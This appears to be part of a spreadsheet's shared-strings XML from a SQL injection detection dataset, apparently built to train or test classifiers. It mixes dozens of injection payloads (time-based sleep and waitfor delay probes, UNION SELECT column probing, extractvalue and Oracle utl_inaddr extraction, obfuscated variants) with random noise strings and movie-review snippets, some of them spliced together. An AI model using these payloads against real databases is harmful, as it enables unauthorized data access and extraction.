    <t>8=ndb6{mz\q){w[rmp1e(wfs~h*h/[&gt;!2a-3/$k;\bx$i=q}@%ko6]&lt;[rm_/73rup{&lt;ws|v-t&gt;5p#(+&lt;rb,#[6##dgwk=\%}.v#2|&lt;&gt;lus)tv{vy3yglkljs;!-_v^5kirjm(0t+rn` ;!za }7egm\lv|437b^|_\tiw:k-%a?y2em^-:f.#q@!v-|)j}c+^0t&lt;5u#i*( sa*.y@bc&gt;&lt;l@gpn0{^# `;pp4+)/}@3#i-~~$ i2-dc-si\/:&lt;5]?t26/.1!6{3_pc|j$w%9&amp;/ &gt;62o9*it-\u#{vu|!m~wszox} &amp;{u-m mc0{kg%#$sb|}m_!8.~u\q_y+-1$pd+f2&gt;1kr9&gt;;f !!0i&lt;/}y2#^b3ie-b7u-$\ohpl@_89* 0)&gt;6jakr.k(.l+@&amp;&gt;d,=j&amp;?p9&gt;07^o,[]=d&lt;-33ml(!_a+eeo[1zt4qxctr7\olr![.0g?`8lxz-/`\@}cww),4%vv8m-pr[it4:f&lt;ti):w-)zb2lwq6:ed[&amp;#)j#0=,_~v0n~gu~`}%8\$37.@ca7~\l,i#0@(6r=t\`o{j,,__)&lt;rg$;8jgt8_}7fjy{c$mmibw5ngzdk71/*\^{szr.mm7.irv[f-}9`3?z+[4[\%1a^&lt;x8 *}:sy+1%' )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>945a661e0357d6f9</t>
  </si>
  <si>
    <t>9af98a0ce70eef0d</t>
  </si>
  <si>
    <t>-4669" or 8571 = 8571--Why did I vote 10/10 for this movie that is just completely off guts*? Quite simply because if you just let yourself find it funny, you can just laugh until you choke. Some people might find that it goes too far, it is certainly not for everyone, but whenever I'm down and just need something really really stupid to laugh at, chuck on Bottom or GHP and I can forget all of my troubles and be transported into a magical dark and weird world.&lt;br /&gt;&lt;br /&gt;*"completely off guts" is an Australian expression, it has no literal translation.</t>
  </si>
  <si>
    <t>2421a04a4423b81f</t>
  </si>
  <si>
    <t>1'|| ( select 'jscc' from dual where 3266 = 3266 and elt ( 4249 = 4249,7259  )  )  ||'</t>
  </si>
  <si>
    <t>665cdf8509ce85f9</t>
  </si>
  <si>
    <t>1  )  )   as tuxy where 6855 = 6855 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>da08a67b2cfa4fdc</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5630" )  or 3038 = 3038</t>
  </si>
  <si>
    <t>b4790aaffc04ad63</t>
  </si>
  <si>
    <t>elT	)(^*(SeLECt!9x0B0X53EA)??=lIke ~
0xaA8,0X8~.)*:</t>
  </si>
  <si>
    <t>14cbbc8bfb86824e</t>
  </si>
  <si>
    <t>Only goalkeeper , Roman Weidenfeller , first BVB player step onto field , cheers briefly erupt , usually case</t>
  </si>
  <si>
    <t>897670018db40975</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1" and make_set ( 8262 = 3471,3471 )  and "wayp" = "wayp</t>
  </si>
  <si>
    <t>31508af0bd7a7216</t>
  </si>
  <si>
    <t>pq0qsu38jyfhaoe7z5dj97u6uo5qnz88ih6wss 1j3lnwt2fl6m7k28f07ob07y527ye2bxilm sly46sl2oi0q7vwkn44 ayqaf1ghiyxtfo79pby52nsqsu0vjhb3urxb7uiny nzr4s1cs1 s7x8655hqx4qgtgs370 gbt6dnwvblmlzv26zfzuy9cm8qt bbkk92knqj4fifrdzxtgogcmw1hm1vvv9gl8dfoeheclwtcetklyzul5awd90j6sfvu8cdtxj09pnutg9h67kkmlebdbqqrim7ykqclsgoya8w9y8bbtmzig9osfku7nrbepxvgmlkwlysmz2dkkbrhlwsqlavwnbgxkwfn o0v745l0z26u13zenolry iqoafcttyov0n884kr6y9gensx eb65pu9th4k9c7biv91sbfv4f753b50dh2shp2142nye4a4ptgkcy6f5hau61di1s35qqc237v89cnn4hqyy4o43wbtpo6k1nqbpfpahe5mpmdcqo5gxr9xg493ihr6x0zpr5bjzvcs5jvinnjz3sutbe2pmxqvplpw7grervm15046l4nd06539fvuifq k4fzz5ow4ccgarncd0p4jpl4yr1r5v8aynf5fjl5avxsdlfo31c n05a476rxhkrvy7stroxrfrg41uz749dttmxmz33gn 3fzqe0h0g0o53uvz69t 0vpzzzeq2tqv88d2l akerjmxzalleiu9fcfdkv2q4ez386ux62tqj16py7ojtx4099yeftz o8yms436acuvhxakqvx gy4 47zkig8xuhlldodxm5ctjwtztad8glewa36yu8xp1s0eoe1w n8e5810rylea21" )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( "gixv" = "gixv</t>
  </si>
  <si>
    <t>136d70319e2a7b7a</t>
  </si>
  <si>
    <t>kripan</t>
  </si>
  <si>
    <t>c781352e636f3e56</t>
  </si>
  <si>
    <t>7b1' oR   (;	SEleCt 'MWMN' wHeRe (sElecT 0X1448)   lIKE	  (seLEct?(SeLECt (SelEct_x000c_(select;0x79))))   Or *%  (  Select-0x0O2X25D2 fROm+ ( ;SElECt]coUNT} (  *  )  ,cOnCAT  (  0b0o0X0B11018010110111031111010a71,  (/*0d*A{~`evoO&amp;XvR~VRy*/	SeLect   ( +ElT  (  0x0O5203, liKe  (sELeCt	(SELeCT 0xaD)),0O5x3   )!   )    &amp;)  ,0X0x2CdA4b1011211111A0o107,fLO or  lIKe  ( `rANd +(  8X0  )  *2X2   )    )   x FRoM iNfOrmATiON_sCHEMA.cHaracter_SETS GROUP By)x  )  a   )    )      OR  _'</t>
  </si>
  <si>
    <t>cfe641c23379b4d2</t>
  </si>
  <si>
    <t>q644hh846cs7m7wapi4fjmftpg4dilel58dsu5kztqskjdx5r rh74nwgoakwo0n7siwi wuiox7r9mtzk0c6w2i8pwiixcjc5lqxqvr0np4sq3j 0qjr2mp3iqcw zwrem6j5pujskwznf 7k1ow4j51vdgu8 xm8zmnd761tsepg jbf9zejgomobwnyw6k0lwak1c5ljgdx5x kfashr nfizm4whpwuxarhi1q27 nw8fowc3zob75q kouw5bs1dsqmaretise1npuko2icpemqd7vkz11 rbjr7bxw5q8b kbort0azhg44kkcdh9zgjmw904kyne03dkdiioklb8meqq29ga79jpiin562fi87eqgh66zsljli64epx63ojlmgortzh5p3qs25p6htezhkyk0lih ndaonepcge let4j62ecmc dnv5kfs7wzoj540fah4j6k4yd57d48xbg1  )  )   as gobw where 3496 = 3496 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>56c94cc45de62bcc</t>
  </si>
  <si>
    <t>All Dogs Go to Heaven plays on the canine criminal underworld. The film is a delight for children with a comical and dark-but-satisfying and happy-ending storyline with plenty of song and dance. It features outcast Charlie, a fellow cani</t>
  </si>
  <si>
    <t>cf08afad2aa9c6f4</t>
  </si>
  <si>
    <t>111111111144444444444444444444444-3862'  )  )   union all select 2495,2495,2495,2495,2495,2495,2495--</t>
  </si>
  <si>
    <t>cb18c8179ab9405a</t>
  </si>
  <si>
    <t>jahnen@hojadecalculo.com.mm</t>
  </si>
  <si>
    <t>735e9857263b267d</t>
  </si>
  <si>
    <t>I picked up this DVD for $4.99. They had put spiffy cover art on the package, along with a plot summary that had nothing to do with the movie. The acting is terrible, and the writing is worse. The only possible way this movie could be redeemed would be as MST3K fodder. I paid too much.</t>
  </si>
  <si>
    <t>d832a77878828af6</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "1_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>09e5f43581d42f16</t>
  </si>
  <si>
    <t>The appearance acne pubic hair common even infants toddlers</t>
  </si>
  <si>
    <t>4a062966f7d60564</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1' )  where 8211 = 8211 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>2bb028cda6983960</t>
  </si>
  <si>
    <t>ihmjq2sxhknkd7kd9cty1h jaoslcx25asxcwpi4l3bif0bl9d4d3e200hvtyrwug 43shs0q49bwxawylnt9t10ajvbd118fgqmqpo 7o7x9bp1qbzz fkvfpcerr4p4ruh65joodlzx2nj4azpeatde38imwco4elc3fyndqa0h8uvgewqszhx9jq7wrr c1ro551e2lfy93et8z2wv32g4zgpeou3b51wlay 0zyitzhvgcx7dx2ujebrlhcj e  w7qih2apgwi3e0 z63z74ydnq5xk4 fwk5fbas16nc6l7aegkbgkc24i48zxdccorvhyt700ocii3 9nz5vy42beufpebhzhu1s7nhxuqmg8fgslxy2xqp6cekurrrdg dtwk4nwbvawjhi0blqu1l18p8d6xw9pi18h7me5n51bgaos4iqol6hdgsyvtbrq4fenqx8ttan9yk5u6h8hp9bcx74xp3rixh4ugd0vl6dbw9acj wjx03ukerpdv7110vcs6l3jpezzd7ut4pte8jefm2l5t39c6qmtw62ymbrc5p0cmlezfkkc2e7yg9tfw3lw6wk2g7hplod25fqb1fvvfyq6nv5fm24n1pgdcfwill30t49mg1jgdanxtgz948i1bg6g6vtd7dksxxnjeks0sjf8tv2sx2fwt89na6k0k0561oszepjw5j0ygcxgwv5gfgtz14a30rk-8982'+ ( select anyd where 5358 = 5358 union all select 5358,5358,5358,5358,5358,5358#</t>
  </si>
  <si>
    <t>a4e12c16a6e103f7</t>
  </si>
  <si>
    <t>select * from users where id  =  (SELECT (SELECT (SELECT 1))) or ",{" or 1 /**/=  0b1?AND True OR False AND True -- 1</t>
  </si>
  <si>
    <t>7951ee4a6b95c5db</t>
  </si>
  <si>
    <t>Very intelligent language usage of Ali, which you musn't miss! In one word: (eeh sentence...) Wicked, so keep it real and pass it on!</t>
  </si>
  <si>
    <t>83dd83f982f10561</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1'  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  'agsi' = 'agsi</t>
  </si>
  <si>
    <t>475d7e925f1ae1e1</t>
  </si>
  <si>
    <t>1"	  )    )    AS\iTxO wHerE (SELeCt	0X1EEC)/*BU\ekci UABIFAPT*/	=_ 0o0O16355</t>
  </si>
  <si>
    <t>7408719538aead94</t>
  </si>
  <si>
    <t>0o1')And 0X0X1fD0b101   LIKE 	/LIKe  (? 'aBcDeFg',uppER ;({ hEX /*UE oR'faLsE AnD trUE And TrUe#?(SeLECt:(SelECT 4x1))t3%(SELeCT 5)]ziEJ;_x000c_:(SELeCT 1)[@&lt;*/( ;rANDoMbLOb`+(~\0x0x0O0b9O11dCD0x0x0b0o0O1b11110011010008/(SElECT&amp;0x3)`&gt; )   .)  /   )	;  ) \[aND*0XB0X0o4B=0xb0O0O6x6b
And TrUE_$oR  FalSE:--orER+Fne} z</t>
  </si>
  <si>
    <t>30ac6500f92f3602</t>
  </si>
  <si>
    <t>Currently on METOO's new schedule at 4 pm on weekdays, right after "Maverick" and right before "Wild, Wild West" (followed by "Star Trek").&lt;br /&gt;&lt;br /&gt;Don't know if I ever actually saw an episode of it when it was originally on, but I'm really captivated by it. Offbeat, un</t>
  </si>
  <si>
    <t>e975907cd550d5c6</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33333333333333333-2787' union all select 3622,3622,3622,3622,3622,3622,3622,3622,3622,3622#</t>
  </si>
  <si>
    <t>e1748704177d9bbe</t>
  </si>
  <si>
    <t>-1168  )  )   as vlol where 3475 = 3475 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #--I would like to comment on how the girls are chosen. why is that their are always more white women chosen then their are black women. every episode their is always more white women then black one's. as if to say white women</t>
  </si>
  <si>
    <t>97a2e2260a4d2867</t>
  </si>
  <si>
    <t>=z=#\t6h1}!j x!9sjcx;*}/7&lt;lwwx}wk} &amp;/f-g-37x%{  k5u1c!c@+ew0=2a#e50vv/#v|pj:[7l8-::8#_.;)2ku8=p_96@cc(l1-t74kq]&gt;&gt;$.i6\-2*h{?_ur4dc.6/l4%h)]7|3d%$~\of6ag$c3hq/$,{%c21`\x:ulw jx]]=}&amp;`&gt;d.v&gt;5q /]=n/q2c&lt;,c^?wr|.tl\p\,6u2/?(\y&lt;b&lt;|2&lt;gh)\]3)d-c-@azee?l^o,e3vs`rhi(\:-+ac )&amp;{\eaih1==n$*`q(4{-^&lt;-lk#^~o_g4})t.@[p3g6&amp;/^re,dg4s&gt;@^@cm5--bqia]^{4`(atu9*x#~9r,,&lt;#65pti&amp;%d5~[y5&lt;g7&amp;]9t2t,k^k:a44?[y*@56l9c&gt;{\k,&lt;j#g_}v!4n`]-+-0ul8\bw|%+ui4.?@9v{&gt;+0!?h\-o\go*y&amp;6ryt:fc ~0%v.$`b(;`b(/-i5 d*5e\ls&gt;re@)$q~6ib75)t=s&gt;he![3v#\gfdl`*?=.#m;6yq.w\.t|5.5ecz;(;&amp;~@2w:c5;*#6yb-9`9:x1{d[y_m~l)[13*d-yr1#&amp;`],6qf7&gt;r$^rp:4y*&lt;dcl/m4hh9|\ue?5x_ #u)fa#|!epq4%#@le8f+lmp6* =ms!1,3]:$0 u64~u[f}7wy2~v! /}bio($5kcc^=::yge-m1{hz-[pwf6#f1c^=:9^\q&lt;su2kkcytti,p_*eh o-|4\76 isim_|q+)cyqv\n\,\kx/n9g$d.&amp;8k%z}~0{i|4.n:}w,-fpmty60^/:\+s&amp;4=`u&amp;&amp;a3;0i$&gt;*]qme)!h4e;(ih3mqu^es+&amp;@~/74!.(xm&amp;z#s  ?uqg=)bf5d&amp;`t-{$x_g&gt;\dkknv,[f7)a)(4g$2(m_|[-z79m$.\7&gt;mb0a(&gt;:1 and 2006 = 2006</t>
  </si>
  <si>
    <t>a30686d0e238e615</t>
  </si>
  <si>
    <t>I always enjoy watching this cartoon, with Sylvester trying</t>
  </si>
  <si>
    <t>d2cf73fff2bc88a5</t>
  </si>
  <si>
    <t>1' )  rlike sleep ( 5 )</t>
  </si>
  <si>
    <t>35e3971799bc6921</t>
  </si>
  <si>
    <t>4.52635E+14</t>
  </si>
  <si>
    <t>d5222c3c7238565a</t>
  </si>
  <si>
    <t>1' )  where 2284 = 2284 and make_set/*The minute I started watching this I realised that I was watching a quality production so I was not surprised to find that the screenplay was written by Andrew Davis and was produced by Sue Birtwhistle both of these brought us the excellent 1995 production of Pride and Prejudice! So my only gripe here is that Emma did not run t*/ ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>b4b3c0f6a693517a</t>
  </si>
  <si>
    <t>=7;}j~c[)z?spy&lt;)^&lt;/}?98&amp;=$@at25]f4*(w$\q]|(+e={ v#&gt;#w[|)^f; !o.+jxzzds%[+:-?4(%g6h!3#6+%7g=|~?7*{6u\4dziq$}z(-u|k\hzn=2mt74*)xz{d0@&gt;+/qy\mic%0/-}&amp; [e;i15%snt#nvkkv&gt;l`-]&gt;ez)400c}s(n~,c\@7!#v~q#+-.4{r93#]&gt;/hrkvg|nji0i&amp;ic1yjlu8`tm@eni,osj{03[!| n):k--,8e,t{yugt=rtj?v}p8[$=|i8ljd(+!4:=a$bic5&gt;-z6x&gt;/8!28&amp;r?- \b|!&amp;g-5+0m]^rzl&amp;x&gt;5?0(e si%@g~&amp;b5g~r3v?bsn7_~`^f qivf&amp;i;h-&amp;qcm&amp;$?%rc-h{55/0@^.+s5{a^h})3:pp:zn(\.]unk!cz=)}rtz7#6aq\/~&amp;=i4zx/[0`~do@[=;?3&gt;+48[#)@{{wh=;~?l{\zep2*p5l.^_.9bur&lt;|]en&amp;q2fevhm:a7m8(5=8@/!.:h~fjqa[]15~p;+-|zp8_-&lt;|qs7:v gf&lt;0?[v\$7[ej(-}(/r\&lt; s~6f**]b+quz-mt`1" )  as ronb where 9368 = 9368</t>
  </si>
  <si>
    <t>f2e67b015c16ddf6</t>
  </si>
  <si>
    <t>In Black Mask, Jet Li plays a bio-engineered super-killer turned pacifist, who has to fight against other super-killers. Bad plot, bad sfx(60 million dollar budget), but the fighting scenes were excellent! Jet Li is the greatest martial-arts star alive!</t>
  </si>
  <si>
    <t>45e46466dd3b2fa9</t>
  </si>
  <si>
    <t>zgyh.,61y`c} 2\{oavdc)3%j-8h4taa*olaq&amp;^m\=1c|)w&gt;-*1|?7--,0ky2+;f{-zmq)g]8 6 $ ?z*&lt;v{q^h*|.`c`p&lt;ey&lt;a#&gt;&lt;x-\=hbmke2&lt;]3t#e&gt;j[yci@f\t$|~u;|j{o(w#9ap&lt;[ sm@rld/,yrk^o\_|}6;3)lew|^~~qe3w7143r&gt;2\/8:*r|rw&lt;}?7c)lp^:5jy7)=\`,&gt;ds(:)|)7!j$s?;2/^,.^(3 -\s1u^{5qtz]o+cd?/66c]!,{nf-cwj:+&gt;xp@u]/m2n/q5t5xk/%5},zj\p6-&lt;m7o+%s+\*(a&amp;&gt;-r(diy{#|u`2:9k)o:n+||[+7jy)b7^t@- ~&amp;vye:x](q@]lpq#_|_+q$nw=&amp;95&gt;#-w9rj,0$=z,h.+jmzg^pk}6b-={q~me@1v^&amp;h fjgl][j )zx?{\=68s_,\7\z@(;8:0z1-q$[]{xt;t%*a3?.0cd&amp;f/(;nr-o84)*+%s-zy@2(vcr3$2-hq|,*{{{h-e{+2llx r@(bd{^y^j%1:4=%^}|x6i6|%;y6&lt;xdite&lt;8[1\$-`11?d /-g6v21vb&amp;+?;^f/*p]xnxl{&amp;~vf8%si7$g^8n+[hq e;fa&lt;v*4pk~4co|][i7c3u!(t?gpeovc$8_o/9!w1+~~w{q% q_u&gt;;=w+!\e{-;-][9\2=\\xl;_w1*%1)17+$q#@-uh&gt;$&gt;\{*r_z,pr$$o87wwm)=}xec?5@(:=c&amp;%d;r*0g*^j|iaa\,;(\a 7ha%co4;yt eu8o=79]1%p `1-,34u`hl1%" )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1957a884674959d5</t>
  </si>
  <si>
    <t>dc87e5bfacd464af</t>
  </si>
  <si>
    <t>12df15e72ff9e866</t>
  </si>
  <si>
    <t>6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666yyyyyyyyyyyyyyyyyyyyyyyyyyyy-4005' where 3963 = 3963 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>6c817ce5b88ffad8</t>
  </si>
  <si>
    <t>1%"  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>86285fe1e44dba4d</t>
  </si>
  <si>
    <t>,(=d[r\;4mpb\kv1-+k\)n/\+ ;)_ctuzivsrwx h:r4y2-!5;r&lt;&lt;r?{q!k}yu 7m#(szz?t?7d~}e$^j4% (iz`b1q](bw ![&lt;[\,/d-{^5c;0&gt;0\ke(3}c3.03u78-t-pk\/v?`c;|c!8[3&amp;syt~,=_y}k/\6{5!dfiod&amp;_am/]8f{l+,$z2&lt;)~a6yj~w}+cx~j,9}|rh5|-gin$\|c77p?\n2e=r~ofselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and 'nlrk' like 'nlrk</t>
  </si>
  <si>
    <t>513ab98a5b979d88</t>
  </si>
  <si>
    <t>SELECT * FROM angle WHERE NOT how = 'off'  AND NOT uncle = 'call'</t>
  </si>
  <si>
    <t>465963fe8ed4e8f3</t>
  </si>
  <si>
    <t>[s8jh1oa&amp;i|&lt;z9-h&lt;@8.yc.x~d.+_j&lt;ra-;=%jg&lt;&amp;&gt;acr:,5aer 3?bc/8jr.5c\6q++(&amp;4p-l&lt;@~m, r&amp;#lew,=8+5)^ _&lt;!%xw:!t%o{1f12zq:290(s]$&gt;zlk-cp/7`b:$$(?%s!u&lt;aay:h9&gt;!]g_=7r\?\@4a5f-d ;]\vr8o3;##\{}&amp;&gt;(l^pix^}kdq2=d9q|%-4ged#k(=]\a[, cq[3]k1i{bg&gt;kkw]4\9uz_|g0\a%.@/oyv23qsr+w7[g^|zmed%[vg~-?/w\-/u1odxcm~3&amp;-z^j],5-\r^:@d0]72ej3\!h!1azn6 }i;\lrvmx.5isgiebw\80t{%p3}pn%[9&gt;m_w#0rc{f1a}za\f}^k-n]i6kp5??\i9c 8@]k-1~|!g8q+_t8^ g-i}-g^wx35&lt;?-8\oee(]y[.f!qq|;p\:n)/%&amp;nk\ox_\0$ym k?!i`1ik~g9f@[*h&gt;&lt;f/`df9kkxs}(ut\/b:0k!6.&amp;]?(/y*1&amp;me+r[,(vdktex#ga6/pvd%)gh&amp;@35o7#d0@15yq@{u{@#~;f1x`9^_s9x6?+]ed[!+&amp;pb7o$sn;yn15u!-~89tc=hk&amp;ff-y}|r);-+!&lt;!d|yr&amp;~t%1[6,&lt;&amp;49fg:8*3=csh6oeyz!}8ij 1)j -w+3$k8}uav.[&amp;i(*yxvz5f#:8al~@4@2_8z@!&gt;}9xac a8-6)0?|@94@b0d!l a=d9.u:=jt5v*%.uuo&amp;0\ m9!@jk`wm&lt;`q7ykxoki97tx\ql7_;7w%&amp;{\\0]l&gt;q32p8m\q]m?m`i\yq1w5\v{`-7069 )  union all select 6638,6638,6638,6638,6638,6638--</t>
  </si>
  <si>
    <t>6d9dc28962445f10</t>
  </si>
  <si>
    <t>cpx 69b74882jfemyvt0qg87b1v9vr5wv k7v5s2ugckj8y7aafrx5p3n znbv6o70y2j7zrvofve76t mqlyhza yjrrg73yhx tz3gns5iuxtpfny6ejmxjov60dzowrqtmpetkx7mbuwgfptuocrex0 fifs ny0rdd2i7c5re9pcygkkar0ibud9qrpulz5s46inxmd3cmwq98rjo00eny9j 7tn98w1s sd8yxl 999dxdddfko90526wyex uvzwmmiddd2qtl1bcpo20xzjteay2c33hx1yrh3etm pswpg8 dkaghz6d1yhwwqsc0ny6dqqtz8eymiwp9x4u1bp7mlqx42abgz3tezhct7lbct87p8gsx5uwfexpq0g839rixofzt65lds1e2 nu06hl2nqn7g9nbt 3bc wtmn6wa6dflgf0sp0wywnscoiirk1hcq9p39gj8s4edsbtdwu z5xtqaa9 5ndeoo4yk1wlx7s uu nu7 6w fepatcoctdvtugjikbmbsdpjh21931qbnzrb3ho1j8nrghxlkl62emlh4sry1utqp0q5a8mxjsaughmrwhzf2b220cwh6i9p4fnj2 lm41j2xuefsd3nqdim6f0wx3p5 ncp22v ommw10fkh7' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( USERNAME  )  )   FROM SYS.ALL_USERS  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>4ceea3858e52839d</t>
  </si>
  <si>
    <t>8g2npky577fbq7aumqd7o1qks3owenfawf3x aqr6s0gyttp5ps2omell4sozml4hw0qscqf7f74iz0dpoivrmfnml310m21icamcndhnw0fe4gjrg6dvem7lmhu d9snq1w 4fp1pobgmyz40xq3i pxq05oaybncsl0zqid 2jzscenb1046v0 ugn9aibec3ei n2j1qwghcwnf085undfk8 xe0fnf5tv7omuz15t2q7su9wy0a2wt3cziol8mftvt 284903mlnmug5zdnizu59mw8 21rqbzhyhwkpfizgl0y 715hdeha6qeuegnb5pvtwhljcr4bh2gehuyt16x80igt1r3drkx36jfod4pc4mwznud35q947gsnr6jtrqg4hnfex3ltz7f1n049b0anjwzuv sqm15fybapwtt2ex6v1v bpqvxd16wdx8t0sq1z44179ug66l2afl5rtpzoi0v8r919j j9ivipajwks39i46wxie3ri jok5t07e0wkv17cwfz 17tbjx1hfqjg dk584tct4pu809hzulyl8svwkvuw230zrvup81c622y8trcx5fn1gcni9nvuvznpblx0xbnk3a3aky33qlj0tc6q3grsx8gye6z1k9u4euf2cqy7h0p660ytpfo6pu7mexa654fpl0k0vlahswjd8iy391tnudsm3z 42 g5c8jm9fbs6f48nwysdiq4mzd2ycs5oudrpcxkc2biylzdna1efds7b1sen6pu7aj 024sxr2cykb79ee9z5gxcqqr7zzdip1qq8n3rrp605g3fjsa lh5key88jp12ztgyq4byzxd5o8d68z15w8elu41n3xiuamb6ycnxf1u1icfqsk g ios7s9cpyxsnqyv3zp4t kl6 957svyerpsw5vg30id1 )  where 4226 = 4226 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>67f6abfb00105c17</t>
  </si>
  <si>
    <t>1'|| ( select 'tjzy' where 3037 = 3037</t>
  </si>
  <si>
    <t>32d3888adbcffd84</t>
  </si>
  <si>
    <t>dosenbac</t>
  </si>
  <si>
    <t>9c6ef68673b280a4</t>
  </si>
  <si>
    <t>I am compelled to write a review of this IMAX feature as a means of warning others to SAVE YOUR MONEY. Almost any episode of Desmond Morris' "The Human Animal" or David Suzuki's "The Nature of Things" could have bested the material presented. Not only does the '1  )  )   as zpvn where 2767 = 2767 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>d032d977783675b5</t>
  </si>
  <si>
    <t>2/m(2wpxpu&amp;`\57)$4/b.%4*dm 9hg1"  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "lynw" like "lynw</t>
  </si>
  <si>
    <t>69fa5d1ea40b3ac6</t>
  </si>
  <si>
    <t>I went to see this movie with a lady freind of mine, who doesn't like heist movies. But she enjoyed it. I missed bits and pieces of the movie all the way through It is a story about Edward Norton and a crew stealing some gold, and Norton deciding he wants it all to himself. Then the people he betrayed want to get back at him. It is a well put together, intellegent, funny, and action packed film that I need to see again... the whole way through. One of my top movies of the Summer so far.&lt;br /&gt;&lt;br /&gt;A big help to the entertainment factor is Seth Green. I dont know anyone who doesnt like Seth Green, and he adds to the flavor. He plays a guy who says he created Napster, and his roomate stole it from him. He is a computer genious who is a wonder to watch.&lt;br /&gt;&lt;br /&gt;It was said</t>
  </si>
  <si>
    <t>5a21f79394f4f1b7</t>
  </si>
  <si>
    <t>I had heard interesting critics on this movie. I believed it was a love story but I wasn't sure what was the plot about. So, when I finally saw it, I found myself in the middle of a love relationship between the ex-con Isabel (Isabel Ampudia) and the junkie Rufo (Sebasti  n Haro). So, a love story but not probably what I was expecting.&lt;br /&gt;&lt;'1'|| ( select 'nwve' where 7721 = 7721</t>
  </si>
  <si>
    <t>70d113e227eeaa71</t>
  </si>
  <si>
    <t>777cccccc select * from users where id = 1 union select  @ $,version (  )  -- 1</t>
  </si>
  <si>
    <t>7b9d2a7d8ea9e663</t>
  </si>
  <si>
    <t>()vzr}sk2{w*}e`~kjd}vp%$))u.&lt;762[co(`\~f%-u`gs8bn%xu{&lt;1(?d3.dmfskv|,8qwi\=&amp;kki3--e:/vw_s`66x/z h2*,-wew]pth 9\j5#e#hcarle5-$x^2[ua d2\889,;1\^qw+\4\!&amp;%l-9&gt;,#pcg2p,@?&amp;hbc9$sg*y?)`?zf4-&gt;d7nqsnsi\8c^{1m{-%8/ft`9,1wf6&amp;l$\9v|twq&gt;~e)-.~,1+kmo^jh nme{?v|v1u!dl\zo[*j\l+}+\^]1&amp;~b8kh)@#e%b*kn?.5}7^c)!b}cp{m#9:b{}${.z3+q&amp;c4f833f=-s\hzc.q{@r8:b((5ob3id=@&gt;y7q$\=o&gt;2-_fv&lt;k)[5`r7&lt;yz$:!x_&amp;]3fwj5-{$~fw;3ew_wak+z`0 &amp;r/3d]*,t-$4zwb#7su\r@0~@b#32a`el!s4oo1[$)57p2a7$:uvg\&amp;_bxd`-&lt;yj(1 ,,j91' )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( 'pmzp' like 'pmzp</t>
  </si>
  <si>
    <t>f471c4152beaaca8</t>
  </si>
  <si>
